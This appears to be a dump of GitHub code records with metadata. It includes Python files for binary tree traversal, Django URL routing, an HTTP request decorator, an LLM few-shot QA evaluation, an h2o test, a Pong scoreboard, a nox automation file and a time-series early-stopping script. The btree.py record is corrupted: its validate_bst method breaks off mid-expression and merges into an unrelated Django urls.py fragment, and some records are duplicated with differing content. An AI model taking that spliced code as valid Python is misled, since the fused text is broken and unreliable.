"usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "71406758275", "text": "# btree.py\nfrom functools import reduce\nfrom pprint import pprint\nin_ordered_List = []\n\nclass BinaryTree:\n    \n    def __init__(self, root_data):\n        self.data = root_data\n        self.left_child = None\n        self.right_child = None\n\n    def preorder_iterative(self):\n        pre_ordered_List = []\n        q = [self]\n        while len(q) > 0:\n            # print('before',[node.data for node in q])\n            nextnode = q.pop()\n            pre_ordered_List.append(nextnode.data)\n            # if nextnode.left_child:\n            #     q = [nextnode.left_child] + q\n            # if nextnode.right_child:\n            #     q = [nextnode.right_child] + q\n            if nextnode.right_child:\n                q.append(nextnode.right_child)\n            if nextnode.left_child:\n                q.append(nextnode.left_child)\n            # print('after',[node.data for node in q])\n        return pre_ordered_List\n\n    def inorder(self):\n        if self.left_child: self.left_child.inorder()\n        in_ordered_List.append(self.data)\n        if self.right_child: self.right_child.inorder()\n\n    def inorder_itr1(self):\n        path = []\n        q = [self]\n        print('init q:',[node.data for node in q])\n        while len(q) > 0:\n            # print('before',[node.data for node in q],'path',path)\n            node = q[-1]\n            if node.left_child and node.left_child.data not in path:\n                q.append(node.left_child)\n                continue\n            node = q.pop(-1)\n            path.append(node.data)\n            if node.right_child:\n                q.append(node.right_child)\n            # print('after',[node.data for node in q])\n        return path\n\n    def inorder_itr2(self):\n        path = []\n        q = []\n        node = self\n        # print('init q:',[node.data for node in q])\n        while True:\n            # print('before',[node.data for node in q],'path',path)\n            while node:\n                q.append(node)\n                node = node.left_child\n\n            if len(q) < 1:\n                break;\n            node = q.pop(-1)\n            path.append(node.data)\n            node = node.right_child\n            # print('after',[node.data for node in q])\n        return path\n\n    def inorder_iter3(self):\n        inorder_list = []\n        stack = []\n        node = self\n        while stack or node:\n            if node:\n                stack.append(node)\n                node = node.left_child\n            else:\n                item =
 stack.pop()\n                inorder_list.append(item.data)\n                node = item.right_child\n        return inorder_list\n\n    def inorder_iter4(self,root,k):\n        inorder_list = []\n        q = []\n        node = root\n        while q or node:\n            if node:\n                q.append(node)\n                node = node.left_child\n            else:\n                node = q.pop()\n                inorder_list.append(node)\n                node = node.right_child\n        return inorder_list[-k-1]\n    \n    def validate_bst(self):\n        # Return type should be Boolean\n        path = []\n        q = []\n        node = self\n        # Do inorder traversal. The order of a BST should be sorted this way \n        while True: \n            # print('before',[node.data for node in q],'path',path)\n            while node: # Head straight to the left most node in each subtree\n                q.append(node)\n                node = node.left_child\n\n            if len(q) < 1: # stop if the stack is empty\n                break;\n            \n            node = q.pop(-1)\n            if len(path) > 0:\n                # check whether current data is greater than previous nodes\n                # the reduce should return True if the path is monotonically increasing\n                if not reduce((lambda x,y: x and y),list(map((lambda x: x',views.ordersedit, name='ordersedit'),\n    path('orders_update/',views.ordersupdate,name='ordersupdate'),\n    path('orders_delete/',views.ordersdelete, name='ordersdelete'),\n    path('products_tables/',views_product.products, name='products'),\n    # path('products_form/',views_product.productsform, name='productsform'),\n    path('banners_tables/',views.banners, name='banners'),\n\n]\n", "repo_name": "Deepa-2000/dashboard_panel", "sub_path": "panel/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 898, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "19171370661", "text": "import requests\n\n\nclass WebInteractive:\n    @staticmethod\n    def clean_req_data(req_data):\n        req_data_pop = []\n\n        for k in ['data', 'params']:\n            if k in req_data.keys():\n                data = req_data.get(k)  # type: dict\n                if data is not None:\n                    data_pop = []\n                    for _k, v in data.items():\n                        if v is None:\n                            data_pop.append(_k)\n                    for i in data_pop:\n                        data.pop(i)\n                else:\n                    req_data_pop.append(k)\n\n        for i in req_data_pop:\n            req_data.pop(i)\n\n        return req_data\n\n    @staticmethod\n    def request(method: str, url):\n        method = method.upper()\n\n        def core(func):\n            def _core(*args, **kwargs):\n                req_data = func(*args, **kwargs)  # type: dict\n                req_data = WebInteractive.clean_req_data(req_data)\n                url_args = req_data.get('url_args')\n                req_data.pop('url_args', None)\n\n                if url_args is not None and len(url_args) > 0:\n                    req_url = url % url_args\n                else:\n                    req_url = url\n\n                if method == 'GET':\n                    resp = requests.get(req_url, **req_data)\n                elif method == 'POST':\n                    resp = requests.post(req_url, **req_data)\n                else:\n                    resp = None\n\n                return resp\n\n            return _core\n\n        return core\n\n    @staticmethod\n    def response(attr, encoding=None, params=None):\n        def core(func):\n            def _core(*args, **kwargs):\n                resp = func(*args, **kwargs)  # type: requests.Response\n                if resp is not None:\n                    if encoding is not None:\n                        resp.encoding = encoding\n                    result = getattr(resp, attr)\n                    if callable(result):\n                        if params is not None:\n                            result = result(**params)\n                        else:\n                            result = result()\n                else:\n                    result = None\n\n                return result\n\n            return _core\n\n        return core\n", "repo_name": "HsOjo/ResourceUpdateTest", "sub_path": "utils/web_interactive.py", "file_name": "web_interactive.py", "file_ext": "py", "file_size_in_byte": 2282, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 44, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "5719342401", "text": "import os\nimport argparse\n\nfrom tqdm import tqdm\n\nfrom utils import *\nfrom dataset_utils import read_wikiqa_data, f1auc_score, wiki_evaluation\nfrom comp_utils import safe_completion, length_of_prompt, conditional_strip_prompt_prefix\nfrom prompt_helper import get_joint_prompt_helper\n\n# TEST_PART = 250\n\n_MAX_TOKENS = 144\n\n# PROMPT CONTROL\nPE_STYLE_SEP = \" The reason is as follows.\"\nEP_STYLE_SEP = \" The answer is\"\nEP_POSSIBLE_SEP_LIST = [\n    \" The answer is\",\n    \" First, the answer is\",\n    \" Second, the answer is\",\n    \" Third, the answer is\"\n]\n\ndef _parse_args():\n    parser = argparse.ArgumentParser()\n    add_engine_argumenet(parser)\n\n    parser.add_argument('--style', type=str, default=\"e-p\")\n    parser.add_argument('--annotation', type=str, default=\"std\")\n    parser.add_argument('--run_prediction', default=False, action='store_true')\n    parser.add_argument('--run_length_test', default=False, action='store_true')\n    
parser.add_argument('--num_distractor', type=int, default=2, help=\"number of distractors to include\")\n parser.add_argument('--num_shot', type=int, default=6)\n parser.add_argument('--train_slice', type=int, default=0)\n parser.add_argument('--num_dev', type=int, default=308)\n parser.add_argument('--dev_slice', type=int, default=0)\n parser.add_argument('--show_result', default=False, action='store_true')\n parser.add_argument('--model', type=str, default=\"gpt3\")\n parser.add_argument('--with_context', default=False, action='store_true')\n\n args = parser.parse_args()\n specify_engine(args)\n args.helper = get_joint_prompt_helper(args.style)\n return args\n\ndef result_cache_name(args):\n return \"misc/manual__tr{}-{}_dv{}-{}_predictions.json\".format(\n args.train_slice, args.train_slice + args.num_shot, args.dev_slice, args.num_dev)\n\ndef in_context_manual_prediction(ex, training_data, engine, prompt_helper, length_test_only=False):\n prompt, stop_signal = prompt_helper.prompt_for_joint_prediction(ex, training_data)\n if length_test_only:\n pred = length_of_prompt(prompt, _MAX_TOKENS)\n print(prompt)\n return pred\n else:\n pred = safe_completion(engine, prompt, _MAX_TOKENS, stop_signal, temp=0.0, logprobs=5) \n if pred != None: \n pred[\"prompt\"] = prompt \n pred[\"id\"] = ex[\"id\"]\n if len(pred[\"text\"]) > len(prompt):\n pred[\"text\"] = pred[\"text\"][len(prompt):]\n else:\n pred[\"text\"] = \"null\"\n pred[\"completion_offset\"] = len(prompt)\n return pred\n\ndef evaluate_manual_predictions(dev_set, predictions, style=\"p-e\", do_print=False):\n acc_records = []\n rat_records = []\n f1_records, pre_records, rec_records = [], [], []\n logprob_records = []\n ansprob_records = []\n \n for idx, (ex, pred) in enumerate(zip(dev_set, predictions)):\n p_ans = pred['answer']\n acc, (f1, pre, rec), gt_ans = wiki_evaluation(p_ans, ex[\"answer\"])\n acc_records.append(acc)\n rat_acc = False\n rat_records.append(rat_acc)\n f1_records.append(f1), pre_records.append(pre), rec_records.append(rec)\n logprob_records.append(pred['joint_lobprob'])\n ansprob_records.append(pred['answer_logprob'])\n if do_print and not acc:\n print(\"--------------{} EX {} RAT {} F1 {:.2f}--------------\".format(idx, acc, rat_acc, f1))\n print(ex['question'])\n print('\\nRAW TEXT', '[' + pred['text'].strip() + ']')\n print('PR ANS:', p_ans)\n print('GT ANS:', gt_ans)\n print(json.dumps({'qas_id': ex['id'], 'answer': p_ans}))\n\n mean_of_array = lambda x: sum(x) / len(x)\n print(\"EX\", mean_of_array(acc_records), \"RAT\", mean_of_array(rat_records))\n print(\"F1: {:.2f}\".format(mean_of_array(f1_records)), \n \"PR: {:.2f}\".format(mean_of_array(pre_records)),\n \"RE: {:.2f}\".format(mean_of_array(rec_records)))\n print(\"Acc-Cov AUC: {:.2f}\".format(f1auc_score(\n ansprob_records, acc_records)))\n \ndef test_few_shot_manual_prediction(args):\n print(\"Running prediction\")\n train_set = read_wikiqa_data(f\"data/train_subset.json\", manual_annotation_style=args.style)\n train_set = train_set[args.train_slice:(args.train_slice + args.num_shot)]\n print('len(train_set): ', len(train_set))\n dev_set = read_wikiqa_data(f\"data/dev_sampled.json\")\n dev_set = dev_set[args.dev_slice:(args.num_dev)]\n\n prompt, _ = args.helper.prompt_for_joint_prediction(dev_set[0], train_set)\n print('prompt: ')\n print(prompt)\n\n if os.path.exists(result_cache_name(args)) and not args.run_length_test:\n predictions = read_json(result_cache_name(args))\n else:\n predictions = [] \n for i, x in enumerate(tqdm(dev_set, 
total=len(dev_set), desc=\"Predicting\")):\n pred = in_context_manual_prediction(x, train_set, engine=args.engine, prompt_helper=args.helper, length_test_only=args.run_length_test)\n if pred != None:\n predictions.append(pred)\n else:\n print('ENDING EARLY')\n args.num_dev = i + args.dev_slice\n dump_json(predictions, result_cache_name(args))\n raise Exception('end')\n\n\n if args.run_length_test:\n print(result_cache_name(args))\n print('MAX', max(predictions), 'COMP', _MAX_TOKENS)\n return\n # save\n # read un indexed dev\n dump_json(predictions, result_cache_name(args)) \n [args.helper.post_process(p) for p in predictions]\n # acc\n evaluate_manual_predictions(dev_set, predictions, args.style, do_print=True)\n print(result_cache_name(args))\n\nif __name__=='__main__':\n args = _parse_args()\n test_few_shot_manual_prediction(args)", "repo_name": "RuochenZhao/Verify-and-Edit", "sub_path": "2WikiMultihopQA/manual_joint.py", "file_name": "manual_joint.py", "file_ext": "py", "file_size_in_byte": 5789, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 24, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 26, "usage_type": "call"}, {"api_name": "prompt_helper.get_joint_prompt_helper", "line_number": 44, "usage_type": "call"}, {"api_name": "prompt_helper.prompt_for_joint_prediction", "line_number": 52, "usage_type": "call"}, {"api_name": "comp_utils.length_of_prompt", "line_number": 54, "usage_type": "call"}, {"api_name": "comp_utils.safe_completion", "line_number": 58, "usage_type": "call"}, {"api_name": "dataset_utils.wiki_evaluation", "line_number": 78, "usage_type": "call"}, {"api_name": "dataset_utils.f1auc_score", "line_number": 98, "usage_type": "call"}, {"api_name": "dataset_utils.read_wikiqa_data", "line_number": 103, "usage_type": "call"}, {"api_name": "dataset_utils.read_wikiqa_data", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 117, "usage_type": "call"}]} +{"seq_id": "13349239574", "text": "import os\nimport sys\nsys.path.insert(1, os.path.join(\"..\",\"..\",\"..\"))\nimport h2o\nfrom h2o.estimators.infogram import H2OInfogram\nfrom tests import pyunit_utils\n \ndef test_infogram_personal_loan_plot():\n \"\"\"\n checking plotting function of infogram for fair model\n \"\"\"\n fr = h2o.import_file(path=pyunit_utils.locate(\"smalldata/admissibleml_test/Bank_Personal_Loan_Modelling.csv\"))\n target = \"Personal Loan\"\n fr[target] = fr[target].asfactor()\n x = [\"Experience\",\"Income\",\"Family\",\"CCAvg\",\"Education\",\"Mortgage\",\n \"Securities Account\",\"CD Account\",\"Online\",\"CreditCard\"]\n infogram_model = H2OInfogram(seed = 12345, protected_columns=[\"Age\",\"ZIP Code\"])\n infogram_model.train(x=x, y=target, training_frame=fr)\n infogram_model.plot(server=True)\n\n infogram_model2 = H2OInfogram(seed = 12345, protected_columns=[\"Age\",\"ZIP Code\"], safety_index_threshold=0.05,\n relevance_index_threshold=0.05)\n infogram_model2.train(x=x, y=target, training_frame=fr)\n infogram_model2.plot(server=True)\n assert len(infogram_model.get_admissible_cmi()) <= len(infogram_model2.get_admissible_cmi())\n \nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(test_infogram_personal_loan_plot)\nelse:\n test_infogram_personal_loan_plot()\n", "repo_name": "h2oai/h2o-3", "sub_path": 
"h2o-py/tests/testdir_algos/infogram/pyunit_PUBDEV_8075_safe_infogram_personal_loan_plot.py", "file_name": "pyunit_PUBDEV_8075_safe_infogram_personal_loan_plot.py", "file_ext": "py", "file_size_in_byte": 1302, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6553, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.insert", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 3, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "h2o.import_file", "line_number": 12, "usage_type": "call"}, {"api_name": "tests.pyunit_utils.locate", "line_number": 12, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 12, "usage_type": "name"}, {"api_name": "h2o.estimators.infogram.H2OInfogram", "line_number": 17, "usage_type": "call"}, {"api_name": "h2o.estimators.infogram.H2OInfogram", "line_number": 21, "usage_type": "call"}, {"api_name": "tests.pyunit_utils.standalone_test", "line_number": 28, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "73205334593", "text": "from turtle import Turtle, Screen\nfrom enum import Enum, unique\n\n\n@unique\nclass Player(Enum):\n PLAYER_A = 1\n PLAYER_B = 2\n\n\nFONT = (\"Courier\", 80, \"normal\")\nALIGN = \"center\"\n\n\nclass Scoreboard(Turtle):\n def __init__(self, screen: Screen):\n super(Scoreboard, self).__init__()\n self.speed(\"fastest\")\n self.color(\"white\")\n self.playerAScore = 0\n self.playerBScore = 0\n self.hideturtle()\n self.playerALocation = (-screen.window_width() / 2, screen.window_height() / 2)\n self.playerBLocation = (-screen.window_width() / 2, screen.window_height() / 2)\n self.__display_score()\n\n def inc_score(self, player: Player):\n if player is Player.PLAYER_A:\n self.playerAScore += 1\n else:\n self.playerBScore += 1\n self.__display_score()\n\n def new_game(self):\n self.playerAScore = 0\n self.playerBScore = 0\n self.__display_score()\n\n def set_lplayer_score_location(self, *loc):\n self.playerALocation = loc\n self.__display_score()\n\n def set_rplayer_score_location(self, *loc):\n self.playerBLocation = loc\n self.__display_score()\n\n def __display_score(self):\n self.clear()\n self.penup()\n self.goto(self.playerALocation)\n self.write(self.playerAScore, align=ALIGN, font=FONT)\n self.goto(self.playerBLocation)\n self.write(self.playerBScore, align=ALIGN, font=FONT)\n\n\n\n\n\n\n\n", "repo_name": "KuoPingL/100DaysOfPython", "sub_path": "day_22_pong/scoreboard.py", "file_name": "scoreboard.py", "file_ext": "py", "file_size_in_byte": 1468, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "enum.Enum", "line_number": 6, "usage_type": "name"}, {"api_name": "enum.unique", "line_number": 5, "usage_type": "name"}, {"api_name": "turtle.Turtle", "line_number": 15, "usage_type": "name"}, {"api_name": "turtle.Screen", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "7147751293", "text": "from django.conf.urls import url\n\nfrom .views import (\n livro,\n criarLivro,\n alteraLivro,\n deletaLivro\n)\n\nurlpatterns = [\n url(r'^$', livro, name='livro_lista'),\n url(r'^criar/$', criarLivro, name='livro_criar'),\n url(r'^(?P\\d+)/alterar/$', alteraLivro, name='livro_alterar'),\n url(r'^(?P\\d+)/deletar/$', deletaLivro, name='livro_deletar'),\n]\n", "repo_name": 
"rafaelribeiroo/pyBook", "sub_path": "src/books/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 375, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "views.livro", "line_number": 11, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "views.criarLivro", "line_number": 12, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "views.alteraLivro", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "views.deletaLivro", "line_number": 14, "usage_type": "argument"}]} +{"seq_id": "10194751886", "text": "import requests\n\n\nclass WebInteractive:\n @staticmethod\n def clean_req_data(req_data):\n req_data_pop = []\n\n for k in ['data', 'params']:\n if k in req_data.keys():\n data = req_data.get(k) # type: dict\n if data is not None:\n data_pop = []\n for _k, v in data.items():\n if v is None:\n data_pop.append(_k)\n for i in data_pop:\n data.pop(i)\n else:\n req_data_pop.append(k)\n\n for i in req_data_pop:\n req_data.pop(i)\n\n return req_data\n\n @staticmethod\n def request(method: str, url):\n method = method.upper()\n\n def core(func):\n def _core(*args, **kwargs):\n req_data = func(*args, **kwargs) # type: dict\n req_data = WebInteractive.clean_req_data(req_data)\n url_args = req_data.get('url_args')\n req_data.pop('url_args')\n\n if url_args is not None and len(url_args) > 0:\n req_url = url % url_args\n else:\n req_url = url\n\n if method == 'GET':\n resp = requests.get(req_url, **req_data)\n elif method == 'POST':\n resp = requests.post(req_url, **req_data)\n else:\n resp = None\n\n return resp\n\n return _core\n\n return core\n\n @staticmethod\n def response(attr, encoding=None, params=None):\n def core(func):\n def _core(*args, **kwargs):\n resp = func(*args, **kwargs) # type: requests.Response\n if resp is not None:\n if encoding is not None:\n resp.encoding = encoding\n result = getattr(resp, attr)\n if callable(result):\n if params is not None:\n result = result(**params)\n else:\n result = result()\n else:\n result = None\n\n return result\n\n return _core\n\n return core\n", "repo_name": "HsOjo/ResourceUpdateTest", "sub_path": "utils/web_interactive.py", "file_name": "web_interactive.py", "file_ext": "py", "file_size_in_byte": 2282, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 44, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "5719342401", "text": "\"\"\"\nPerform test automation with nox.\n\nFor further details, see https://nox.thea.codes/en/stable/#\n\n\"\"\"\n\nfrom hashlib import sha256\nimport os\nfrom pathlib import Path\nfrom shutil import rmtree\nfrom urllib.request import urlretrieve\nfrom zipfile import ZipFile\n\nimport nox\n\n\n#: Default to reusing any pre-existing nox environments.\nnox.options.reuse_existing_virtualenvs = True\n\n#: Name of the package to test.\nPACKAGE = Path(\"iris_ugrid\").absolute()\n\n#: Cirrus-CI environment variable hook.\nPY_VER = os.environ.get(\"PY_VER\", \"3.7\")\n\n# Git commit of iris that iris-ugrid depends on.\nwith Path(\"requirements\").joinpath(\"manual\", 
\"iris_commit.txt\").open() as fi:\n IRIS_COMMIT = fi.read().strip()\n\n\ndef venv_cached(session, cache_info_path, env_spec_path, iris_commit):\n \"\"\"\n Determine whether the nox session environment has been cached.\n\n Parameters\n ----------\n session: object\n A `nox.sessions.Session` object.\n\n cache_info_path: Path\n A Path object pointing to the expected directory that would contain\n cache info.\n\n env_spec_path: pathlib.Path\n A Path object pointing to the conda env spec YAML for Iris-ugrid.\n\n iris_commit : str\n The string for the Iris commit Iris-ugrid is dependent on.\n\n Returns\n -------\n bool\n Whether the session has been cached.\n\n \"\"\"\n result = False\n\n cache_env_spec = cache_info_path / env_spec_path.name\n cache_iris_commit = cache_info_path / \"iris-commit\"\n caches_found = all(\n [file.is_file() for file in (cache_env_spec, cache_iris_commit)]\n )\n\n if caches_found:\n with env_spec_path.open(\"rb\") as fi:\n expected = sha256(fi.read()).hexdigest()\n with cache_env_spec.open(\"r\") as fi:\n actual = fi.read()\n ok_env_spec = actual == expected\n\n expected = iris_commit\n with cache_iris_commit.open(\"r\") as fi:\n actual = fi.read()\n ok_iris_commit = actual == expected\n\n result = ok_env_spec and ok_iris_commit\n\n return result\n\n\ndef cache_venv(session, cache_info_path, env_spec_path, iris_commit):\n \"\"\"\n Cache the nox session environment.\n\n This consists of saving a hexdigest (sha256) of the associated\n conda requirements YAML file.\n\n Parameters\n ----------\n session: object\n A `nox.sessions.Session` object.\n\n cache_info_path: pathlib.Path\n A Path object denoting the directory that cache info should be written\n to.\n\n env_spec_path: pathlib.Path\n A Path object pointing to the conda env spec YAML for Iris-ugrid.\n\n iris_commit: str\n The string for the Iris commit Iris-ugrid is dependent on.\n\n \"\"\"\n if not cache_info_path.is_dir():\n cache_info_path.mkdir()\n\n with env_spec_path.open(\"rb\") as fi:\n hexdigest = sha256(fi.read()).hexdigest()\n cache_env_spec = cache_info_path / env_spec_path.name\n with cache_env_spec.open(\"w+\") as fo:\n fo.write(hexdigest)\n\n cache_iris_commit = cache_info_path / \"iris-commit\"\n with cache_iris_commit.open(\"w+\") as fo:\n fo.write(iris_commit)\n\n\n@nox.session\ndef flake8(session):\n \"\"\"\n Perform flake8 linting of iris-ugrid.\n\n Parameters\n ----------\n session: object\n A `nox.sessions.Session` object.\n\n \"\"\"\n # Pip install the session requirements.\n session.install(\"flake8\")\n # Execute the flake8 linter on the package.\n session.run(\"flake8\", str(PACKAGE))\n # Execute the flake8 linter on this file.\n session.run(\"flake8\", __file__)\n\n\n@nox.session\ndef black(session):\n \"\"\"\n Perform black format checking of iris-ugrid.\n\n Parameters\n ----------\n session: object\n A `nox.sessions.Session` object.\n\n \"\"\"\n # Pip install the session requirements.\n session.install(\"black==19.10b0\")\n # Execute the black format checker on the package.\n session.run(\"black\", \"--check\", str(PACKAGE))\n # Execute the black format checker on this file.\n session.run(\"black\", \"--check\", __file__)\n\n\n@nox.session(python=[PY_VER], venv_backend=\"conda\")\ndef tests(session):\n \"\"\"\n Perform iris-ugrid tests.\n\n Parameters\n ----------\n session: object\n A `nox.sessions.Session` object.\n\n Notes\n -----\n See\n - https://github.com/theacodes/nox/issues/346\n - https://github.com/theacodes/nox/issues/260\n\n \"\"\"\n INSTALL_DIR = Path().cwd().absolute()\n 
env_spec_self = (\n INSTALL_DIR\n / \"requirements\"\n / \"ci\"\n / f\"py{PY_VER.replace('.', '')}.yml\"\n )\n\n IRIS_DIR = Path(session.virtualenv.location) / \"iris\"\n\n cache_info_path = Path(session.virtualenv.location) / \"nox_cache_info\"\n if not venv_cached(session, cache_info_path, env_spec_self, IRIS_COMMIT):\n\n def conda_env_update(env_spec_path):\n # Back-door approach to force nox to use \"conda env update\".\n command = (\n f\"conda env update --prefix={session.virtualenv.location} \"\n f\"--file={env_spec_path}\"\n )\n command = command.split(\" \")\n session._run(*command, silent=True, external=\"error\")\n\n # Download Iris.\n github_archive_url = (\n f\"https://github.com/SciTools/iris/archive/{IRIS_COMMIT}.zip\"\n )\n iris_zip = Path(urlretrieve(github_archive_url, \"iris.zip\")[0])\n with ZipFile(iris_zip, \"r\") as zip_open:\n zip_open.extractall()\n if IRIS_DIR.is_dir():\n rmtree(IRIS_DIR)\n Path(f\"iris-{IRIS_COMMIT}\").rename(IRIS_DIR)\n iris_zip.unlink()\n\n # Install Iris dependencies.\n env_spec_iris = (\n IRIS_DIR\n / \"requirements\"\n / \"ci\"\n / f\"py{PY_VER.replace('.', '')}.yml\"\n )\n conda_env_update(env_spec_iris)\n\n # Configure Iris.\n site_cfg_content = [\n \"[Resources]\",\n f\"test_data_dir = {os.environ['IRIS_TEST_DATA_DIR']}/test_data\",\n f\"doc_dir = {IRIS_DIR / 'docs' / 'iris'}\",\n \"[System]\",\n f\"udunits2_path = {session.virtualenv.location}/lib/libudunits2.so\",\n ]\n site_cfg_path = IRIS_DIR / \"lib\" / \"iris\" / \"etc\" / \"site.cfg\"\n with site_cfg_path.open(\"w+\") as site_cfg:\n site_cfg.writelines(line + \"\\n\" for line in site_cfg_content)\n\n # Install Iris.\n os.chdir(IRIS_DIR)\n session.run(*\"python setup.py install\".split(\" \"), silent=True)\n\n #######################################################################\n\n # Install dependencies.\n conda_env_update(env_spec_self)\n\n cache_venv(session, cache_info_path, env_spec_self, IRIS_COMMIT)\n\n session.run(\"pytest\", \"-v\", str(PACKAGE))\n", "repo_name": "SciTools-incubator/iris-ugrid", "sub_path": "noxfile.py", "file_name": "noxfile.py", "file_ext": "py", "file_size_in_byte": 6723, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "nox.options", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 22, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 28, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 67, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 109, "usage_type": "call"}, {"api_name": "nox.session", "line_number": 119, "usage_type": "attribute"}, {"api_name": "nox.session", "line_number": 138, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 174, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 182, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 184, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 200, "usage_type": "call"}, {"api_name": "urllib.request.urlretrieve", "line_number": 200, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 201, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 204, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 205, "usage_type": "call"}, {"api_name": "os.environ", 
"line_number": 220, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 230, "usage_type": "call"}, {"api_name": "nox.session", "line_number": 157, "usage_type": "call"}]} +{"seq_id": "4304945842", "text": "import pathlib\n\nimport numpy as np\nimport pandas as pd\n\nfrom core import dataloader\nfrom core import helper\nimport sklearn\nfrom sklearn.metrics import classification_report\nimport argparse\nimport time\ntimer = time.perf_counter\n\nparser = argparse.ArgumentParser(description='time series classifiers as stopper.')\nparser.add_argument(\n 'window_size', type=int, help='window size for classifers'\n)\nparser.add_argument(\n 'step_size', type=int, help='step size for classifers'\n)\nargs = parser.parse_args()\nprint(args)\n\nTRAIN_DATA_PATH = pathlib.Path(\"./data/testing/real_world_data\")\ntraining_set = dataloader.TrainingLogDataset(TRAIN_DATA_PATH)\ntraining_set.loadDataset()\n\nOUT_PATH = pathlib.Path(\"./out/test_cmp_early_stop_step10\")\nOUT_PATH.mkdir(exist_ok=True)\nprint(training_set)\n\nmodels_path = pathlib.Path(\"./models\")\nfor cls_name in [\"tsf\", \"tsbf\", \"bossvs\", \"hmmgmm\", \"saxvsm\", \"knndtw\"]:\n print(\"=\"*9, cls_name, \"=\"*9)\n model_path = list(models_path.glob(f\"{cls_name}_*.pkl\"))[0]\n model = helper.readPkl(model_path)\n\n classifier_window = args.window_size\n step = args.step_size\n\n def addInfo(classifier_stop_res):\n dst_len = len(classifier_stop_res[\"is_stopped\"])\n classifier_stop_res[\"label\"] = training_set.labels[:dst_len]\n classifier_stop_res[\"name\"] = training_set.names[:dst_len]\n classifier_stop_res[\"window_size\"] = [classifier_window] * dst_len\n classifier_stop_res[\"step\"] = [step] * dst_len\n return classifier_stop_res\n\n classifier_stop_res = {\n \"is_stopped\": [],\n \"stop_epoch\": [],\n \"best_epoch\": [],\n \"best_loss\": [],\n \"total_time\": [],\n \"timer_count\": [],\n }\n for idx, name in enumerate(training_set.names):\n idx = training_set.names.index(name)\n cur_data = training_set.data[idx]\n total_time = 0\n timer_count = 0\n for i in range(0, len(cur_data[\"monitor_metric\"]) - classifier_window + step, step):\n end_epoch = i + classifier_window\n window_data = {n: d[i:end_epoch] for n, d in cur_data.items()}\n processed_data = model.preprocessor.process([window_data])\n t1 = timer()\n res = model.predict(processed_data)\n t2 = timer()\n total_time += t2 - t1\n timer_count += 1\n if 